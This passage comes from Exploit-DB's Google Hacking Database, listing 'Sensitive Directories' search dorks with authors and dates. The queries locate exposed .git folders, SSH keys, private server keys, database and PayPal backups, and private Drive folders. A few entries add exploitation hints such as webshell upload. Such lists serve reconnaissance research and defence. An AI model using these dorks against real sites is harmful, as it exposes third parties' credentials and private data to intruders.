<shortDescription>intitle:\index.of inurl:/websendmail/</shortDescription>
<textualDescription>Sites with WebGais - Websendmail.
Author: Parth S. Patel
https://ca.linkedin.com/in/parthpateloscp
</textualDescription>
<query>intitle:index.of inurl:/websendmail/</query>
<querystring>https://www.google.com/search?q=intitle:\index.of inurl:/websendmail/</querystring>
<edb></edb>
<date>2018-04-16</date>
<author>Parth S. Patel</author>
</entry>
<entry>
<id>5264</id>
<link>https://www.exploit-db.com/ghdb/5264</link>
<category>Sensitive Directories</category>
<shortDescription>Inurl : /list/hdd1</shortDescription>
<textualDescription># Google Dork: Inurl: /list/hdd1
# Date: 2019-06-19
# Author: l0n1s
</textualDescription>
<query>Inurl : /list/hdd1</query>
<querystring>https://www.google.com/search?q=Inurl : /list/hdd1</querystring>
<edb></edb>
<date>2019-06-20</date>
<author>l0n1s</author>
</entry>
<entry>
<id>6630</id>
<link>https://www.exploit-db.com/ghdb/6630</link>
<category>Sensitive Directories</category>
<shortDescription>inurl: /.git</shortDescription>
<textualDescription># DorK: inurl: /.git
# Author Name: Tuhin Bose
Description: Contains sensitive info about github repos.
</textualDescription>
<query>inurl: /.git</query>
<querystring>https://www.google.com/search?q=inurl: /.git</querystring>
<edb></edb>
<date>2020-10-21</date>
<author>Tuhin Bose</author>
</entry>
<entry>
<id>5313</id>
<link>https://www.exploit-db.com/ghdb/5313</link>
<category>Sensitive Directories</category>
<shortDescription>inurl: /filemanager/dialog.php</shortDescription>
<textualDescription>Dork : inurl: /filemanager/dialog.php
Impact :Sensitive directories
Author: Aditya shende
Date : 1 august 2019
</textualDescription>
<query>inurl: /filemanager/dialog.php</query>
<querystring>https://www.google.com/search?q=inurl: /filemanager/dialog.php</querystring>
<edb></edb>
<date>2019-08-02</date>
<author>Aditya shende</author>
</entry>
<entry>
<id>5498</id>
<link>https://www.exploit-db.com/ghdb/5498</link>
<category>Sensitive Directories</category>
<shortDescription>inurl: /upload.php intitle:index of</shortDescription>
<textualDescription>Google Dork: inurl: /upload.php intitle:index of
Category: Vulnerable Files.
Author:Abhishek Samaddar
</textualDescription>
<query>inurl: /upload.php intitle:index of</query>
<querystring>https://www.google.com/search?q=inurl: /upload.php intitle:index of</querystring>
<edb></edb>
<date>2019-09-04</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>4362</id>
<link>https://www.exploit-db.com/ghdb/4362</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;.esy.es/default.php&quot;</shortDescription>
<textualDescription>Dork: inurl:&quot;.esy.es/default.php&quot;
You can add “Here is a list of files in your public_html folder” in the dork ……
Dork by INILERM</textualDescription>
<query>inurl:&quot;.esy.es/default.php&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;.esy.es/default.php&quot;</querystring>
<edb></edb>
<date>2016-11-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>5121</id>
<link>https://www.exploit-db.com/ghdb/5121</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/.Trash&quot; intitle:&quot;index of&quot; ~</shortDescription>
<textualDescription>Juicy info in some *nix Trash bins.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;/.Trash&quot; intitle:&quot;index of&quot; ~</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/.Trash&quot; intitle:&quot;index of&quot; ~</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>5120</id>
<link>https://www.exploit-db.com/ghdb/5120</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/cgi-bin/CVS/&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ Find filed in cgi-bin directories ++
inurl:&quot;/cgi-bin/CVS/&quot;
</textualDescription>
<query>inurl:&quot;/cgi-bin/CVS/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cgi-bin/CVS/&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4067</id>
<link>https://www.exploit-db.com/ghdb/4067</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/cms/app/webroot&quot;</shortDescription>
<textualDescription>inurl:&quot;/cms/app/webroot&quot;
Author:ShockvaWe (mrnoone)
özüm</textualDescription>
<query>inurl:&quot;/cms/app/webroot&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/cms/app/webroot&quot;</querystring>
<edb></edb>
<date>2015-09-01</date>
<author>anonymous</author>
</entry>
<entry>
<id>4467</id>
<link>https://www.exploit-db.com/ghdb/4467</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/drive/folders/&quot; site:drive.google.com</shortDescription>
<textualDescription>Google Drive folders
-Xploit </textualDescription>
<query>inurl:&quot;/drive/folders/&quot; site:drive.google.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/drive/folders/&quot; site:drive.google.com</querystring>
<edb></edb>
<date>2017-05-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>5758</id>
<link>https://www.exploit-db.com/ghdb/5758</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/includes/api/&quot; intext:&quot;index of /&quot;</shortDescription>
<textualDescription>Dork to Find interesting folder related to API
inurl:&quot;/includes/api/&quot; intext:&quot;index of /&quot;
Sagar Banwa
</textualDescription>
<query>inurl:&quot;/includes/api/&quot; intext:&quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/includes/api/&quot; intext:&quot;index of /&quot;</querystring>
<edb></edb>
<date>2020-03-02</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>5759</id>
<link>https://www.exploit-db.com/ghdb/5759</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/includes/OAuth2&quot; intext:&quot;index of /&quot;</shortDescription>
<textualDescription>inurl:&quot;/includes/OAuth2&quot; intext:&quot;index of /&quot;
Sagar Banwa
</textualDescription>
<query>inurl:&quot;/includes/OAuth2&quot; intext:&quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/includes/OAuth2&quot; intext:&quot;index of /&quot;</querystring>
<edb></edb>
<date>2020-03-02</date>
<author>Sagar Banwa</author>
</entry>
<entry>
<id>5071</id>
<link>https://www.exploit-db.com/ghdb/5071</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/irj/go/km/&quot; intext:navigation</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP files, filesystem information, file structure ++
inurl:”/irj/go/km/&quot; intext:navigation
- extract SAP server documents
- Find SAP server
- Find server structure
- Find usernames and passwords
- Find sensitive data
- To exploit go to site and click on “Navigation user interface”
- 1.890 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
</textualDescription>
<query>inurl:&quot;/irj/go/km/&quot; intext:navigation</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/irj/go/km/&quot; intext:navigation</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>5070</id>
<link>https://www.exploit-db.com/ghdb/5070</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/irj/go/km/docs/&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP files, filesystem information, file structure ++
inurl:”/irj/go/km/docs/”
- Large amounts of information
- User data
- Sensitive data
- Documents
- File structure of server
- To exploit go to site and click on “Navigation user interface”
- You can download the entire SAP servers directory
- 86.600 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
Some of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing
</textualDescription>
<query>inurl:&quot;/irj/go/km/docs/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/irj/go/km/docs/&quot;</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>5072</id>
<link>https://www.exploit-db.com/ghdb/5072</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/webdynpro/resources/sap.com/&quot;</shortDescription>
<textualDescription>AUTHOR: FlyingFrog
Twitter: @ItsKarl0z
++ SAP software components and tools listing ++
inurl:”/webdynpro/resources/sap.com/&quot;
- Find software installed on servers
- Version info
- SAP J2EE exploits
- Exploit server software
- Find adminconsole
- Possible SQL Injection:
- https://www.exploit-db.com/exploits/43495
- Create new users
- 1.670 results at the time of writing
DISCLAIMER:
(The vulnerabilities are suggestions, none of them have been tested by me,
always request permission before testing anything on someone else system)
</textualDescription>
<query>inurl:&quot;/webdynpro/resources/sap.com/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/webdynpro/resources/sap.com/&quot;</querystring>
<edb></edb>
<date>2019-01-09</date>
<author>FlyingFrog</author>
</entry>
<entry>
<id>4815</id>
<link>https://www.exploit-db.com/ghdb/4815</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/wp-content/uploads/db-backup&quot;</shortDescription>
<textualDescription>Searching for the backup directory of WP-DB Backup plugin (WordPress).
Sang Bui
</textualDescription>
<query>inurl:&quot;/wp-content/uploads/db-backup&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-content/uploads/db-backup&quot;</querystring>
<edb></edb>
<date>2018-05-11</date>
<author>Sang Bui</author>
</entry>
<entry>
<id>4996</id>
<link>https://www.exploit-db.com/ghdb/4996</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;/wp-json/&quot; -wordpress</shortDescription>
<textualDescription>Google dork *description: * Sites running WordPress CMS and access to the
wp-json API endpoint which *might* be vulnerable to content injection
*Google Search: *inurl:&quot;/wp-json/&quot; -wordpress
Submitted by: Alfie
Website: (https://the-infosec.com)
</textualDescription>
<query>inurl:&quot;/wp-json/&quot; -wordpress</query>
<querystring>https://www.google.com/search?q=inurl:&quot;/wp-json/&quot; -wordpress</querystring>
<edb></edb>
<date>2018-10-23</date>
<author>Alfie</author>
</entry>
<entry>
<id>5063</id>
<link>https://www.exploit-db.com/ghdb/5063</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;ai1wm-backups&quot;</shortDescription>
<textualDescription>Find WordPress backup files and publicly accessible wp-content directories.
</textualDescription>
<query>inurl:&quot;ai1wm-backups&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;ai1wm-backups&quot;</querystring>
<edb></edb>
<date>2019-01-02</date>
<author>Chris Rogers</author>
</entry>
<entry>
<id>4710</id>
<link>https://www.exploit-db.com/ghdb/4710</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;apps/backend/config/&quot;</shortDescription>
<textualDescription>Directories containing Symfony CMS juicy info and files
Bruno Schmid
</textualDescription>
<query>inurl:&quot;apps/backend/config/&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;apps/backend/config/&quot;</querystring>
<edb></edb>
<date>2018-03-27</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4082</id>
<link>https://www.exploit-db.com/ghdb/4082</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;default.php&quot; intext:&quot;website&quot; &quot;has been successfully installed on the server!&quot;</shortDescription>
<textualDescription>Dork= inurl:&quot;default.php&quot; intext:&quot;website&quot; &quot;has been successfully installed on the server!&quot;
Details: Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.
Silent_z3r0Pakistan Cyber Army</textualDescription>
<query>inurl:&quot;default.php&quot; intext:&quot;website&quot; &quot;has been successfully installed on the server!&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;default.php&quot; intext:&quot;website&quot; &quot;has been successfully installed on the server!&quot;</querystring>
<edb></edb>
<date>2015-09-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>4464</id>
<link>https://www.exploit-db.com/ghdb/4464</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;folderview?id=&quot; site:drive.google.com</shortDescription>
<textualDescription>Finds people's private folders on Google Drive
Dxtroyer</textualDescription>
<query>inurl:&quot;folderview?id=&quot; site:drive.google.com</query>
<querystring>https://www.google.com/search?q=inurl:&quot;folderview?id=&quot; site:drive.google.com</querystring>
<edb></edb>
<date>2017-05-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>4626</id>
<link>https://www.exploit-db.com/ghdb/4626</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;nfs://www.&quot; &quot;index of /&quot;</shortDescription>
<textualDescription>This dork return files shared in Network File System (NFS)
Tahani Al-Otaibi
</textualDescription>
<query>inurl:&quot;nfs://www.&quot; &quot;index of /&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;nfs://www.&quot; &quot;index of /&quot;</querystring>
<edb></edb>
<date>2017-11-29</date>
<author>Tahani Al-Otaibi</author>
</entry>
<entry>
<id>4822</id>
<link>https://www.exploit-db.com/ghdb/4822</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;paypal&quot; intitle:&quot;index of&quot; backup | db | access -github</shortDescription>
<textualDescription>Some juicy information regarding paypal backups and more.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;paypal&quot; intitle:&quot;index of&quot; backup | db | access -github</query>
<querystring>https://www.google.com/search?q=inurl:&quot;paypal&quot; intitle:&quot;index of&quot; backup | db | access -github</querystring>
<edb></edb>
<date>2018-05-16</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4827</id>
<link>https://www.exploit-db.com/ghdb/4827</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;RootFolder=&quot; Allitems &quot;confidential&quot; | &quot;classified&quot; | &quot;passwords&quot; | username</shortDescription>
<textualDescription>SharePoint directories exposing sensitive information, usernames and
somtimes passwords
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>inurl:&quot;RootFolder=&quot; Allitems &quot;confidential&quot; | &quot;classified&quot; | &quot;passwords&quot; | username</query>
<querystring>https://www.google.com/search?q=inurl:&quot;RootFolder=&quot; Allitems &quot;confidential&quot; | &quot;classified&quot; | &quot;passwords&quot; | username</querystring>
<edb></edb>
<date>2018-05-17</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>4118</id>
<link>https://www.exploit-db.com/ghdb/4118</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:&quot;wp-content/uploads/private&quot;</shortDescription>
<textualDescription>Directories with juicy data.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:&quot;wp-content/uploads/private&quot;</query>
<querystring>https://www.google.com/search?q=inurl:&quot;wp-content/uploads/private&quot;</querystring>
<edb></edb>
<date>2015-11-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4837</id>
<link>https://www.exploit-db.com/ghdb/4837</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:'listprojects.spr'</shortDescription>
<textualDescription>Dork show a list of project in Codebeamer directory
Author: Brain Reflow
</textualDescription>
<query>inurl:'listprojects.spr'</query>
<querystring>https://www.google.com/search?q=inurl:'listprojects.spr'</querystring>
<edb></edb>
<date>2018-06-04</date>
<author>Brain Reflow</author>
</entry>
<entry>
<id>4098</id>
<link>https://www.exploit-db.com/ghdb/4098</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:.DS_Store intitle:index.of</shortDescription>
<textualDescription>Directories with DS_Store files.
By Rootkit Pentester.</textualDescription>
<query>inurl:.DS_Store intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:.DS_Store intitle:index.of</querystring>
<edb></edb>
<date>2015-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4097</id>
<link>https://www.exploit-db.com/ghdb/4097</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:.listing intitle:index.of</shortDescription>
<textualDescription>Directories with .listing files.
By Rootkit Pentester.</textualDescription>
<query>inurl:.listing intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:.listing intitle:index.of</querystring>
<edb></edb>
<date>2015-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4294</id>
<link>https://www.exploit-db.com/ghdb/4294</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:.ssh intitle:index.of authorized_keys</shortDescription>
<textualDescription>SSH Keys
inurl:.ssh intitle:index.of authorized_keys
Decoy</textualDescription>
<query>inurl:.ssh intitle:index.of authorized_keys</query>
<querystring>https://www.google.com/search?q=inurl:.ssh intitle:index.of authorized_keys</querystring>
<edb></edb>
<date>2016-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5487</id>
<link>https://www.exploit-db.com/ghdb/5487</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/admin/ intitle:index.of</shortDescription>
<textualDescription>Google Dork: inurl:/admin/ intitle:index.of
Category: Sensitive Directories
Description: Index.of/ Sensitive Directories (i.e */admin/ )
Author:Abhishek Samaddar</textualDescription>
<query>inurl:/admin/ intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:/admin/ intitle:index.of</querystring>
<edb></edb>
<date>2019-09-02</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>4099</id>
<link>https://www.exploit-db.com/ghdb/4099</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/aspnet_client/system_web/</shortDescription>
<textualDescription>Google dork Description: Juice Directory &quot;ASP&quot;
Google search: inurl:/aspnet_client/system_web/
Note:
Juice Directory. - Yudha[at]glosmon.com</textualDescription>
<query>inurl:/aspnet_client/system_web/</query>
<querystring>https://www.google.com/search?q=inurl:/aspnet_client/system_web/</querystring>
<edb></edb>
<date>2015-10-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>6768</id>
<link>https://www.exploit-db.com/ghdb/6768</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/certs/server.key</shortDescription>
<textualDescription>Google Dork: inurl:/certs/server.key
This will expose the Private RSA Key.
(Sensitive Data Exposure)
Author : Pratik Khalane
Date: 01/02/2021
</textualDescription>
<query>inurl:/certs/server.key</query>
<querystring>https://www.google.com/search?q=inurl:/certs/server.key</querystring>
<edb></edb>
<date>2021-02-01</date>
<author>Pratik Khalane</author>
</entry>
<entry>
<id>3983</id>
<link>https://www.exploit-db.com/ghdb/3983</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/cgi-bin/.cgi</shortDescription>
<textualDescription>Finds open index of /cgi-bin.</textualDescription>
<query>inurl:/cgi-bin/.cgi</query>
<querystring>https://www.google.com/search?q=inurl:/cgi-bin/.cgi</querystring>
<edb></edb>
<date>2015-01-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>5494</id>
<link>https://www.exploit-db.com/ghdb/5494</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/database* ext:sql intext:index of -site:github.com</shortDescription>
<textualDescription>Google Dork: inurl:/database* ext:sql intext:index of -site:github.com
Category: Files Containing Juicy Info.
Author:Abhishek Samaddar
</textualDescription>
<query>inurl:/database* ext:sql intext:index of -site:github.com</query>
<querystring>https://www.google.com/search?q=inurl:/database* ext:sql intext:index of -site:github.com</querystring>
<edb></edb>
<date>2019-09-03</date>
<author>Abhishek Samaddar</author>
</entry>
<entry>
<id>4315</id>
<link>https://www.exploit-db.com/ghdb/4315</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/FCKeditor/editor/filemanager/upload/</shortDescription>
<textualDescription>inurl:/FCKeditor/editor/filemanager/upload/
Let's you go through unprotected files in the FCKeditor
without authentication.</textualDescription>
<query>inurl:/FCKeditor/editor/filemanager/upload/</query>
<querystring>https://www.google.com/search?q=inurl:/FCKeditor/editor/filemanager/upload/</querystring>
<edb></edb>
<date>2016-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4377</id>
<link>https://www.exploit-db.com/ghdb/4377</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php</shortDescription>
<textualDescription>Google Dork: inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
• Refresh
• Select All
• Delete
• Cut
• Copy
• Paste
• New Folder
• Upload ← vulnerable exploit in process for upload webshell
• Close
• Info
Sensitive Directories and Files Containing Juicy Info
Intext:Index of /fckeditor/editor/plugins/ajaxfilemanager
Goolge Dork by INILERM</textualDescription>
<query>inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php</query>
<querystring>https://www.google.com/search?q=inurl:/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php</querystring>
<edb></edb>
<date>2016-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5143</id>
<link>https://www.exploit-db.com/ghdb/5143</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/files/contao</shortDescription>
<textualDescription>This dork show some interested pdf files used in contao CMS.
By Rayen Messaoudi (PsycoR)
</textualDescription>
<query>inurl:/files/contao</query>
<querystring>https://www.google.com/search?q=inurl:/files/contao</querystring>
<edb></edb>
<date>2019-03-04</date>
<author>PsycoR</author>
</entry>
<entry>
<id>6759</id>
<link>https://www.exploit-db.com/ghdb/6759</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/jsps/testoperation.jsp &quot;Test Operation&quot;</shortDescription>
<textualDescription># Google Dork: inurl:/jsps/testoperation.jsp &quot;Test Operation&quot;
# Sensitive directories.
# Date: 11/1/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>inurl:/jsps/testoperation.jsp &quot;Test Operation&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/jsps/testoperation.jsp &quot;Test Operation&quot;</querystring>
<edb></edb>
<date>2021-01-19</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>4681</id>
<link>https://www.exploit-db.com/ghdb/4681</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/openwebmail/cgi-bin/openwebmail/etc/</shortDescription>
<textualDescription>Dork Author: Tunahan GÜRAL(r00t3rXCrypt0)</textualDescription>
<query>inurl:/openwebmail/cgi-bin/openwebmail/etc/</query>
<querystring>https://www.google.com/search?q=inurl:/openwebmail/cgi-bin/openwebmail/etc/</querystring>
<edb></edb>
<date>2018-02-23</date>
<author>r00t3rXCrypt0</author>
</entry>
<entry>
<id>191</id>
<link>https://www.exploit-db.com/ghdb/191</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/pls/sample/admin_/help/</shortDescription>
<textualDescription>This is the default installation location of Oracle manuals. This helps in footprinting a server, allowing an attacker to determine software version information which may aid in an attack.</textualDescription>
<query>inurl:/pls/sample/admin_/help/</query>
<querystring>https://www.google.com/search?q=inurl:/pls/sample/admin_/help/&amp;filter=0</querystring>
<edb></edb>
<date>2004-04-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>5022</id>
<link>https://www.exploit-db.com/ghdb/5022</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/proc/tty/ index of</shortDescription>
<textualDescription>Exploit Title: Using this dork for gathering information by parent directory to discover vulnerable or credential file
Google Dork: inurl:/proc/tty/ index of
Date: 2018-11-10
Exploit Author: blackcat
</textualDescription>
<query>inurl:/proc/tty/ index of</query>
<querystring>https://www.google.com/search?q=inurl:/proc/tty/ index of</querystring>
<edb></edb>
<date>2018-11-12</date>
<author>blackcat</author>
</entry>
<entry>
<id>5503</id>
<link>https://www.exploit-db.com/ghdb/5503</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/scgi-bin*</shortDescription>
<textualDescription>Google Dork Submission for Apache servers, usually publicly facing directories, you might get lucky and find an outdated Cisco Router.
Author: MiningOmerta
</textualDescription>
<query>inurl:/scgi-bin*</query>
<querystring>https://www.google.com/search?q=inurl:/scgi-bin*</querystring>
<edb></edb>
<date>2019-09-05</date>
<author>MiningOmerta</author>
</entry>
<entry>
<id>4163</id>
<link>https://www.exploit-db.com/ghdb/4163</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/server/webapps</shortDescription>
<textualDescription>Google Search: inurl:/server/webapps
Submission Date: 12/19/2015
Description: Apache Tomcat information disclosure.
by @pwns4cash</textualDescription>
<query>inurl:/server/webapps</query>
<querystring>https://www.google.com/search?q=inurl:/server/webapps</querystring>
<edb></edb>
<date>2015-12-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>4280</id>
<link>https://www.exploit-db.com/ghdb/4280</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/sites/default/files/webform/</shortDescription>
<textualDescription>Description: Drupal default web-forms' storage path, usually a lot of files there contains juicy info
Google search: inurl:/sites/default/files/webform/
Dork Author: Serhii Pronin
</textualDescription>
<query>inurl:/sites/default/files/webform/</query>
<querystring>https://www.google.com/search?q=inurl:/sites/default/files/webform/</querystring>
<edb></edb>
<date>2016-05-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>5333</id>
<link>https://www.exploit-db.com/ghdb/5333</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/sites/default/private</shortDescription>
<textualDescription># Google Dork: inurl: inurl:/sites/default/private
# Description: contains sensitive files &amp; directories
# Date: 07-08-2019
# Author: Frédéric Meunier
</textualDescription>
<query>inurl:/sites/default/private</query>
<querystring>https://www.google.com/search?q=inurl:/sites/default/private</querystring>
<edb></edb>
<date>2019-08-12</date>
<author>Frédéric Meunier</author>
</entry>
<entry>
<id>4611</id>
<link>https://www.exploit-db.com/ghdb/4611</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/sym/root/ intitle:index.of</shortDescription>
<textualDescription>Author: Felipe Molina (@felmoltor)
Description:
Probable symbolic links to the root file system of the web server that can
be browsable. This can be produced by a missconfiguration of the server or
because the server has been already compromised by a third party that
wanted to explore the file system of the server easily.
Dork:
inurl:/sym/root/ intitle:index.of
</textualDescription>
<query>inurl:/sym/root/ intitle:index.of</query>
<querystring>https://www.google.com/search?q=inurl:/sym/root/ intitle:index.of</querystring>
<edb></edb>
<date>2017-11-09</date>
<author>felmoltor</author>
</entry>
<entry>
<id>216</id>
<link>https://www.exploit-db.com/ghdb/216</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/tmp</shortDescription>
<textualDescription>Many times, this search will reveal temporary files and directories on the web server. The information included in these files and directories will vary, but an attacker could use this information in an information gathering campaign.</textualDescription>
<query>inurl:/tmp</query>
<querystring>https://www.google.com/search?q=inurl%3A%2Ftmp+</querystring>
<edb></edb>
<date>2004-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4945</id>
<link>https://www.exploit-db.com/ghdb/4945</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/typo3/typo3conf</shortDescription>
<textualDescription>inurl:/typo3/typo3conf
Find interesting files from TYPO3 CMS installation.
by Franciny Salles (#Bl4kd43m0n)
</textualDescription>
<query>inurl:/typo3/typo3conf</query>
<querystring>https://www.google.com/search?q=inurl:/typo3/typo3conf</querystring>
<edb></edb>
<date>2018-09-12</date>
<author>Bl4kd43m0n</author>
</entry>
<entry>
<id>5161</id>
<link>https://www.exploit-db.com/ghdb/5161</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/uploads/wc-logs/</shortDescription>
<textualDescription>WooCommerce Classes Paypal Payment Information
inurl:/uploads/wc-logs/
Discovered By: R3VANBASTARD
</textualDescription>
<query>inurl:/uploads/wc-logs/</query>
<querystring>https://www.google.com/search?q=inurl:/uploads/wc-logs/</querystring>
<edb></edb>
<date>2019-03-25</date>
<author>R3VANBASTARD</author>
</entry>
<entry>
<id>5510</id>
<link>https://www.exploit-db.com/ghdb/5510</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-admin/includes/plugin-install.php</shortDescription>
<textualDescription>dork:
inurl:/wp-admin/includes/plugin-install.php
Author: Mayur Parmar(th3cyb3rc0p)
</textualDescription>
<query>inurl:/wp-admin/includes/plugin-install.php</query>
<querystring>https://www.google.com/search?q=inurl:/wp-admin/includes/plugin-install.php</querystring>
<edb></edb>
<date>2019-09-10</date>
<author>Mayur Parmar</author>
</entry>
<entry>
<id>4614</id>
<link>https://www.exploit-db.com/ghdb/4614</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/plugins/seo-pressor/classes/</shortDescription>
<textualDescription>When you dork with this,it will generate juciy information in parent
directory , for best practice filter according to the country .
Fu2x2000
</textualDescription>
<query>inurl:/wp-content/plugins/seo-pressor/classes/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/plugins/seo-pressor/classes/</querystring>
<edb></edb>
<date>2017-11-15</date>
<author>Fu2x2000</author>
</entry>
<entry>
<id>5587</id>
<link>https://www.exploit-db.com/ghdb/5587</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/uploads/ninja-forms/ intitle:&quot;index of&quot;</shortDescription>
<textualDescription>Google Dork Description: WordPress Ninja Forms Plugin, Sensitive file
uploads.
Google Search: inurl:/wp-content/uploads/ninja-forms/
Author: derezzed
</textualDescription>
<query>inurl:/wp-content/uploads/ninja-forms/ intitle:&quot;index of&quot;</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/ninja-forms/ intitle:&quot;index of&quot;</querystring>
<edb></edb>
<date>2019-10-18</date>
<author>derezzed</author>
</entry>
<entry>
<id>5032</id>
<link>https://www.exploit-db.com/ghdb/5032</link>
<category>Sensitive Directories</category>
<shortDescription>inurl:/wp-content/uploads/wp-backup-plus/</shortDescription>
<textualDescription>Dork
*inurl:/wp-content/uploads/wp-backup-plus/*
</textualDescription>
<query>inurl:/wp-content/uploads/wp-backup-plus/</query>
<querystring>https://www.google.com/search?q=inurl:/wp-content/uploads/wp-backup-plus/</querystring>
<edb></edb>
<date>2018-11-20</date>
<author>PUNIT DARJI</author>
</entry>
<entry>
<id>6862</id>
<link>https://www.exploit-db.com/ghdb/6862</link>
